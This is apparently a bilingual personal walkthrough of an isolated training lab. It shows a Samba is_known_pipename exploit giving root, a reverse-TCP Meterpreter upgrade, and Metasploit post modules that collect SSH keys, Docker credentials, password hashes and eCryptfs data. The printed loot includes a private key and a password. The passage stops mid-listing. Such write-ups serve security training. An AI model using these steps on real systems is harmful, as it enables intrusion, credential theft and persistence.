Post Exploitation Lab II(后期利用实验室 II)
Overview(概述)
In this lab, the target machine is running a vulnerable file sharing service. Exploit it and run the following post modules on the target:
在本实验中,目标机器正在运行易受攻击的文件共享服务。利用它并在目标上运行以下后期模块:
- post/multi/gather/ssh_creds
- post/multi/gather/docker_creds
- post/linux/gather/hashdump
- post/linux/gather/ecryptfs_creds
- post/linux/gather/enum_psk
- post/linux/gather/enum_xchat
- post/linux/gather/phpmyadmin_credsteal
- post/linux/gather/pptpd_chap_secrets
- post/linux/manage/sshkey_persistence
Instructions:
- This lab is dedicated to you! No other users are on this network
- Once you start the lab, you will have access to a root terminal of a Kali instance
- Your Kali has an interface with IP address 192.X.Y.Z. Run “ip addr” to know the values of X and Y.
- The target server should be located at the IP address 192.X.Y.3.
- Do not attack the gateway located at IP address 192.X.Y.1
- postgresql is not running by default so Metasploit may give you an error about this when starting
Solutions
The solution for this lab can be found in the following manual: https://assets.ine.com/labs/ad-manuals/walkthrough-195.pdf
我自己的思路
post/multi/gather/ssh_creds
Multi Gather OpenSSH PKI Credentials Collection
This module will collect the contents of all users’ .ssh directories on the targeted machine. Additionally, known_hosts and authorized_keys and any other files are also downloaded. This module is largely based on firefox_creds.rb.
Multi Gather OpenSSH PKI 凭据集合
该模块将收集目标机器上所有用户的 .ssh 目录的内容。此外,还会下载 known_hosts 和 authorized_keys 以及任何其他文件。该模块主要基于 firefox_creds.rb。
post/multi/gather/docker_creds
Multi Gather Docker Credentials Collection
Multi Gather Docker Credentials Collection
This module will collect the contents of all users’ .docker directories on the targeted machine. If the user has already push to docker hub, chances are that the password was saved in base64 (default behavior).
Multi Gather Docker 凭据集合
该模块将收集目标机器上所有用户的 .docker 目录的内容。 如果用户已经推送到 docker hub,密码很可能是以 base64 格式保存的(默认行为)。
post/linux/gather/hashdump
Linux Gather Dump Password Hashes for Linux Systems
Linux Gather Dump Password Hashes for Linux Systems
Post Module to dump the password hashes for all users on a Linux System
Linux 为 Linux 系统收集转储密码哈希
Post 模块转储 Linux 系统上所有用户的密码哈希
post/linux/gather/ecryptfs_creds
Gather eCryptfs Metadata
This module will collect the contents of all users’ .ecrypts directories on the targeted machine. Collected “wrapped-passphrase” files can be cracked with John the Ripper (JtR) to recover “mount passphrases”.
收集 eCryptfs 元数据
该模块将收集目标机器上所有用户的 .ecrypts 目录的内容。 收集到的“wrapped-passphrase”文件可以用 John the Ripper (JtR) 破解以恢复“mount passphrases”。
post/linux/gather/enum_psk
Linux Gather NetworkManager 802-11-Wireless-Security Credentials
Linux Gather NetworkManager 802-11-Wireless-Security Credentials
This module collects 802-11-Wireless-Security credentials such as Access-Point name and Pre-Shared-Key from Linux NetworkManager connection configuration files.
Linux 收集 NetworkManager 802-11-无线安全凭证
该模块从 Linux NetworkManager 连接配置文件中收集 802-11-Wireless-Security 凭证,例如接入点名称和预共享密钥。
post/linux/gather/enum_xchat
Linux Gather XChat Enumeration
Linux Gather XChat Enumeration
This module will collect XChat’s config files and chat logs from the victim’s machine. There are three actions you may choose: CONFIGS, CHATS, and ALL. The CONFIGS option can be used to collect information such as channel settings, channel/server passwords, etc. The CHATS option will simply download all the .log files.
Linux Gather XChat枚举
该模块将从受害者的机器上收集 XChat 的配置文件和聊天记录。您可以选择三种操作:CONFIGS、CHATS 和 ALL。CONFIGS 选项可用于收集频道设置、频道/服务器密码等信息。CHATS 选项将简单地下载所有 .log 文件。
post/linux/gather/phpmyadmin_credsteal
Phpmyadmin credentials stealer
Phpmyadmin credentials stealer
This module gathers Phpmyadmin creds from target linux machine.
Phpmyadmin 凭据窃取程序
该模块从目标 linux 机器收集 Phpmyadmin 凭据。
post/linux/gather/pptpd_chap_secrets
Linux Gather PPTP VPN chap-secrets Credentials
Linux Gather PPTP VPN chap-secrets Credentials
This module collects PPTP VPN information such as client, server, password, and IP from your target server’s chap-secrets file.
Linux 收集 PPTP VPN chap-secrets 凭据
该模块从目标服务器的 chap-secrets 文件中收集 PPTP VPN 信息,例如客户端、服务器、密码和 IP。
post/linux/manage/sshkey_persistence
SSH Key Persistence
This module will add an SSH key to a specified user (or all), to allow remote login via SSH at any time.
SSH 密钥持久性
该模块将为指定用户(或所有用户)添加 SSH 密钥,以允许随时通过 SSH 进行远程登录。
我自己的思路
1
2
3
4
root@attackdefense:~# ifconfig
eth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.198.6.2 netmask 255.255.255.0 broadcast 192.198.6.255
ether 02:42:c0:c6:06:02 txqueuelen 0 (Ethernet)
Target IP Address: 192.198.6.3
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
root@attackdefense:~# service postgresql start && msfconsole -q
[ ok ] Starting PostgreSQL 11 database server: main.
msf5 > db_nmap -sV 192.198.6.3
[*] Nmap: Starting Nmap 7.70 ( https://nmap.org ) at 2023-03-24 13:59 UTC
[*] Nmap: Nmap scan report for target-1 (192.198.6.3)
[*] Nmap: Host is up (0.0000090s latency).
[*] Nmap: Not shown: 998 closed ports
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
[*] Nmap: 445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
[*] Nmap: MAC Address: 02:42:C0:C6:06:03 (Unknown)
[*] Nmap: Service Info: Host: VICTIM-1
[*] Nmap: Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 11.58 seconds
msf5 > services
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
192.198.6.3 139 tcp netbios-ssn open Samba smbd 3.X - 4.X workgroup: WORKGROUP
192.198.6.3 445 tcp netbios-ssn open Samba smbd 3.X - 4.X workgroup: WORKGROUP
msf5 > setg RHOSTS 192.198.6.3
RHOSTS => 192.198.6.3
1
2
3
4
5
6
7
8
msf5 > search type:exploit samba
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
3 exploit/linux/samba/is_known_pipename 2017-03-24 excellent Yes Samba is_known_pipename() Arbitrary Module Load
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
msf5 > use exploit/linux/samba/is_known_pipename
msf5 exploit(linux/samba/is_known_pipename) > show options
Module options (exploit/linux/samba/is_known_pipename):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.198.6.3 yes The target address range or CIDR identifier
RPORT 445 yes The SMB service port (TCP)
SMB_FOLDER no The directory to use within the writeable SMB share
SMB_SHARE_NAME no The name of the SMB share containing a writeable directory
Exploit target:
Id Name
-- ----
0 Automatic (Interact)
msf5 exploit(linux/samba/is_known_pipename) > exploit
[*] 192.198.6.3:445 - Using location \\192.198.6.3\exploitable\tmp for the path
[*] 192.198.6.3:445 - Retrieving the remote path of the share 'exploitable'
[*] 192.198.6.3:445 - Share 'exploitable' has server-side path '/
[*] 192.198.6.3:445 - Uploaded payload to \\192.198.6.3\exploitable\tmp\KiPyxObR.so
[*] 192.198.6.3:445 - Loading the payload from server-side path /tmp/KiPyxObR.so using \\PIPE\/tmp/KiPyxObR.so...
[-] 192.198.6.3:445 - >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 192.198.6.3:445 - Loading the payload from server-side path /tmp/KiPyxObR.so using /tmp/KiPyxObR.so...
[+] 192.198.6.3:445 - Probe response indicates the interactive payload was loaded...
[*] Found shell.
[*] Command shell session 1 opened (192.198.6.2:34279 -> 192.198.6.3:445) at 2023-03-24 14:04:27 +0000
id
uid=0(root) gid=0(root) groups=0(root)
whoami
root
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
msf5 exploit(linux/samba/is_known_pipename) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell cmd/unix 192.198.6.2:34279 -> 192.198.6.3:445 (192.198.6.3)
msf5 exploit(linux/samba/is_known_pipename) > sessions -u 1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]
[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.198.6.2:4433
[*] Sending stage (985320 bytes) to 192.198.6.3
[*] Meterpreter session 2 opened (192.198.6.2:4433 -> 192.198.6.3:55958) at 2023-03-24 14:07:20 +0000
[*] Command stager progress: 100.00% (773/773 bytes)
msf5 exploit(linux/samba/is_known_pipename) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell cmd/unix 192.198.6.2:34279 -> 192.198.6.3:445 (192.198.6.3)
2 meterpreter x86/linux uid=0, gid=0, euid=0, egid=0 @ 192.198.6.3 192.198.6.2:4433 -> 192.198.6.3:55958 (192.198.6.3)
1
2
3
4
5
6
7
8
9
10
11
12
13
msf5 exploit(linux/samba/is_known_pipename) > sessions 2
[*] Starting interaction with 2...
meterpreter > sysinfo
Computer : 192.198.6.3
OS : Debian 8.11 (Linux 5.4.0-125-generic)
Architecture : x64
BuildTuple : i486-linux-musl
Meterpreter : x86/linux
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter >
Background session 2? [y/N]
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
msf5 exploit(linux/samba/is_known_pipename) > use post/multi/gather/ssh_creds
msf5 post(multi/gather/ssh_creds) > info
Name: Multi Gather OpenSSH PKI Credentials Collection
Module: post/multi/gather/ssh_creds
Platform: BSD, Linux, OSX, Unix
Arch:
Rank: Normal
Provided by:
Jim Halfpenny
Compatible session types:
Meterpreter
Shell
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
Description:
This module will collect the contents of all users' .ssh directories
on the targeted machine. Additionally, known_hosts and
authorized_keys and any other files are also downloaded. This module
is largely based on firefox_creds.rb.
msf5 post(multi/gather/ssh_creds) > set SESSION 2
SESSION => 2
msf5 post(multi/gather/ssh_creds) > exploit
[*] Finding .ssh directories
[*] Looting 1 directories
[+] Downloaded /root/.ssh/id_rsa.pub -> /root/.msf4/loot/20230324141218_default_192.198.6.3_ssh.id_rsa.pub_877265.txt
[-] Could not load SSH Key: Neither PUB key nor PRIV key
[+] Downloaded /root/.ssh/id_rsa -> /root/.msf4/loot/20230324141218_default_192.198.6.3_ssh.id_rsa_113522.txt
[-] Could not load SSH Key: Neither PUB key nor PRIV key
[+] Downloaded /root/.ssh/authorized_keys -> /root/.msf4/loot/20230324141218_default_192.198.6.3_ssh.authorized_k_146361.txt
[-] Could not load SSH Key: Neither PUB key nor PRIV key
[+] Downloaded /root/.ssh/known_hosts -> /root/.msf4/loot/20230324141218_default_192.198.6.3_ssh.known_hosts_532997.txt
[-] Could not load SSH Key: Neither PUB key nor PRIV key
[*] Post module execution completedmsf5 post(multi/gather/ssh_creds) > loot
Loot
====
host service type name content info path---- ------- ---- ---- ------- ---- ----
192.198.6.3 ssh.id_rsa.pub ssh_id_rsa.pub text/plain OpenSSH id_rsa.pub File /root/.msf4/loot/20230324141218_default_192.198.6.
3_ssh.id_rsa.pub_877265.txt
192.198.6.3 ssh.id_rsa ssh_id_rsa text/plain OpenSSH id_rsa File /root/.msf4/loot/20230324141218_default_192.198.6.
3_ssh.id_rsa_113522.txt
192.198.6.3 ssh.authorized_keys ssh_authorized_keys text/plain OpenSSH authorized_keys File /root/.msf4/loot/20230324141218_default_192.198.6.
3_ssh.authorized_k_146361.txt
192.198.6.3 ssh.known_hosts ssh_known_hosts text/plain OpenSSH known_hosts File /root/.msf4/loot/20230324141218_default_192.198.6.
3_ssh.known_hosts_532997.txt
1
2
3
4
5
6
7
8
msf5 post(multi/gather/ssh_creds) > cat /root/.msf4/loot/20230324141218_default_192.198.6.3_ssh.id_rsa.pub_877265.txt
[*] exec: cat /root/.msf4/loot/20230324141218_default_192.198.6.3_ssh.id_rsa.pub_877265.txt
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDCAHi8jxxM2JsOnXhYvcGE+BSk0A/LiYXga5tY0VY1agbBn0eliru1UR8A58JPMAvgRERsI+MumQGruDNzx8iGvaM9EjajR+igMb1UdrJlRDfgvZvDKGje
g57Mifjn3Q+37BTuoaCU13DzCso2CMPKYxrFV3QZw1483G+FTBmKQ6XsFET/0TXwM+gBuZr8Xjgpejumqj9Ai7s4Sc19oGBr0PG7S0Xan0dAIp7X7U3sM2xLnW7jzZUL04TIPWwFkbFNll4xJj7dnLWqB4wf
V7A65R3kg+KRFvGgJbSfxU1uhDJ58BHIfN/CvJNULrqs51vK7DPq4NHPqjx64/XWgdcasct9uNh9saXFIvBC3zr4Ct2L5mQ/F88tTDvpMdOHn7xT/aesrJqOysNs60GK4tcAaRfJdemjyZsXcIL0kITqSu7K
n+eKq0mDAvvtYi9NPBi8dbr80zvKP9VsRMfMylQQz50GXdl9/hqIC/cvfeZbFCbXB2XQY4ln6ftIFFHN2WislqTWeW0jgEDSmXbVI0YGZrks+Q8W7mEi+T/HrcHL6zMpkO5Crte2HLYi5VdHiACKO/aS4wcX
VX4pjg+nc1Qh3japD2GyWdkb+8ILWvdA9wZr5Qk+8UL0NVU2KqdirxXcUIEOil+1K4XD/GoD4BN5J0uhkl3/hUYYf/tWdlFzWw== 172.168.5.153
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
msf5 post(multi/gather/ssh_creds) > cat /root/.msf4/loot/20230324141218_default_192.198.6.3_ssh.id_rsa_113522.txt
[*] exec: cat /root/.msf4/loot/20230324141218_default_192.198.6.3_ssh.id_rsa_113522.txt
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,AD6F56B6F97C8F170282694A190D3E70
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
-----END RSA PRIVATE KEY-----
1
2
3
4
5
6
7
msf5 post(multi/gather/ssh_creds) > cat /root/.msf4/loot/20230324141218_default_192.198.6.3_ssh.authorized_k_146361.txt
[*] exec: cat /root/.msf4/loot/20230324141218_default_192.198.6.3_ssh.authorized_k_146361.txt
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCkk25JgzX1AhKJ44v7u0mEdcnQdQJVMD/OuazI79ZYYjLW6idWVvQoLTm0//0+VIeEJl2hZqdUf1xcrKsJVxITu3gkV9Vt08tcRj0JNOvgoRqls0SkpN49
V/FobPyL93oulrtgAznuQQ0j1IzPec2J6JnSMWydzO5WEyjtMOSes7OO5H4CLhdKyA587MOjMNBWwRhDkOiwdZ8X6AGoysRxQopA96MsKH8RaJhYeRE1dx9woD6nm2s2fkt9Z3mh1OY/QWd12ri6bfCfDcCs
q9HGZb/c2nVGAWVDSMB3ge/N3egqkBmWHnrl1KoBc/Mc+pMrQHGKT6EP1pHa8PVMnRz1
1
2
3
4
5
6
7
msf5 post(multi/gather/ssh_creds) > cat /root/.msf4/loot/20230324141218_default_192.198.6.3_ssh.known_hosts_532997.txt
[*] exec: cat /root/.msf4/loot/20230324141218_default_192.198.6.3_ssh.known_hosts_532997.txt
|1|iM67F1aXb4HjGmoSUbo530yirQI=|OjIgmx0rWohz1taiWu9OzMlhzVo= ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBC3+Idhph1RjOwoUpMym1T3
Z8vXASo/dq1AvHs8OW1Y/YD+z9DgxSwRbBnjR0+i7X2fX/3A0Cul/lDY7qKmfwn8=
|1|P5xNWYsrjEgRNLFeDnL7W5MCaec=|RhjSVMJfPOOR1X0TQGIVmpgvcqU= ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIKbtIYRARYYax0YAinw8ov
8b3ta+yaocJtjFqKtFQ9QJB8mF0CE16WQkMWBDnrsccTbPgZYXI23wEP61AvHIJM=
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
msf5 post(multi/gather/ssh_creds) > use post/multi/gather/docker_creds
msf5 post(multi/gather/docker_creds) > info
Name: Multi Gather Docker Credentials Collection
Module: post/multi/gather/docker_creds
Platform: BSD, Linux, OSX, Unix
Arch:
Rank: Normal
Provided by:
Flibustier
Compatible session types:
Shell
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
Description:
This module will collect the contents of all users' .docker
directories on the targeted machine. If the user has already push to
docker hub, chances are that the password was saved in base64
(default behavior).
msf5 post(multi/gather/docker_creds) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell cmd/unix 192.198.6.2:34279 -> 192.198.6.3:445 (192.198.6.3)
2 meterpreter x86/linux uid=0, gid=0, euid=0, egid=0 @ 192.198.6.3 192.198.6.2:4433 -> 192.198.6.3:55958 (192.198.6.3)
msf5 post(multi/gather/docker_creds) > set SESSION 1
SESSION => 1
msf5 post(multi/gather/docker_creds) > exploit
[*] Finding .docker directories
[*] Looting 1 directories
[*] Downloading /root/.docker/config.json -> config.json
[+] Found attackdefence:Str0ngPassword@123
[+] Saved credentials
[*] Post module execution completed
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
msf5 post(multi/gather/docker_creds) > use post/linux/gather/hashdump
msf5 post(linux/gather/hashdump) > info
Name: Linux Gather Dump Password Hashes for Linux Systems
Module: post/linux/gather/hashdump
Platform: Linux
Arch:
Rank: Normal
Provided by:
Carlos Perez <carlos_perez@darkoperator.com>
Compatible session types:
Meterpreter
Shell
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
Description:
Post Module to dump the password hashes for all users on a Linux
System
msf5 post(linux/gather/hashdump) > set SESSION 2
SESSION => 2
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
msf5 post(linux/gather/hashdump) > exploit
[+] Unshadowed Password File: /root/.msf4/loot/20230324142733_default_192.198.6.3_linux.hashes_326677.txt
[*] Post module execution completed
msf5 post(linux/gather/hashdump) > loot
Loot
====
host service type name content info path
---- ------- ---- ---- ------- ---- ----
192.198.6.3 linux.shadow shadow.tx text/plain Linux Password Shadow File /root/.msf4/loot/20230324142733_default_192.19
8.6.3_linux.shadow_556481.txt
192.198.6.3 linux.passwd passwd.tx text/plain Linux Passwd File /root/.msf4/loot/20230324142733_default_192.19
8.6.3_linux.passwd_449488.txt
192.198.6.3 linux.hashes unshadowed_passwd.pwd text/plain Linux Unshadowed Password File /root/.msf4/loot/20230324142733_default_192.19
8.6.3_linux.hashes_326677.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
msf5 post(linux/gather/hashdump) > cat /root/.msf4/loot/20230324142733_default_192.198.6.3_linux.shadow_556481.txt
[*] exec: cat /root/.msf4/loot/20230324142733_default_192.198.6.3_linux.shadow_556481.txt
root:*:17774:0:99999:7:::
daemon:*:17774:0:99999:7:::
bin:*:17774:0:99999:7:::
sys:*:17774:0:99999:7:::
sync:*:17774:0:99999:7:::
games:*:17774:0:99999:7:::
man:*:17774:0:99999:7:::
lp:*:17774:0:99999:7:::
mail:*:17774:0:99999:7:::
news:*:17774:0:99999:7:::
uucp:*:17774:0:99999:7:::
proxy:*:17774:0:99999:7:::
www-data:*:17774:0:99999:7:::
backup:*:17774:0:99999:7:::
list:*:17774:0:99999:7:::
irc:*:17774:0:99999:7:::
gnats:*:17774:0:99999:7:::
nobody:*:17774:0:99999:7:::
systemd-timesync:*:17774:0:99999:7:::
systemd-network:*:17774:0:99999:7:::
systemd-resolve:*:17774:0:99999:7:::
systemd-bus-proxy:*:17774:0:99999:7:::
messagebus:*:17812:0:99999:7:::
colord:*:17812:0:99999:7:::
saned:*:17812:0:99999:7:::
usbmux:*:17812:0:99999:7:::
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
msf5 post(linux/gather/hashdump) > cat /root/.msf4/loot/20230324142733_default_192.198.6.3_linux.passwd_449488.txt
[*] exec: cat /root/.msf4/loot/20230324142733_default_192.198.6.3_linux.passwd_449488.txt
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false
messagebus:x:104:107::/var/run/dbus:/bin/false
colord:x:105:112:colord colour management daemon,,,:/var/lib/colord:/bin/false
saned:x:106:113::/var/lib/saned:/bin/false
usbmux:x:107:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
msf5 post(linux/gather/hashdump) > use post/linux/gather/ecryptfs_creds
msf5 post(linux/gather/ecryptfs_creds) > info
Name: Gather eCryptfs Metadata
Module: post/linux/gather/ecryptfs_creds
Platform: Linux
Arch:
Rank: Normal
Provided by:
Dhiru Kholia <dhiru@openwall.com>
Compatible session types:
Shell
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
Description:
This module will collect the contents of all users' .ecrypts
directories on the targeted machine. Collected "wrapped-passphrase"
files can be cracked with John the Ripper (JtR) to recover "mount
passphrases".
msf5 post(linux/gather/ecryptfs_creds) > set SESSION 1
SESSION => 1
msf5 post(linux/gather/ecryptfs_creds) > exploit
[!] SESSION may not be compatible with this module.
[*] Finding .ecryptfs directories
[*] Looting 1 directories
[*] Downloading /root/.ecryptfs/sig-cache.txt -> sig-cache.txt
[+] File stored in: /root/.msf4/loot/20230324143535_default_192.198.6.3_ecryptfs.sigcac_464389.txt
[*] Post module execution completed
1
2
3
4
5
6
7
8
9
10
11
12
13
msf5 post(linux/gather/ecryptfs_creds) > loot
Loot
====
host service type name content info path
---- ------- ---- ---- ------- ---- ----
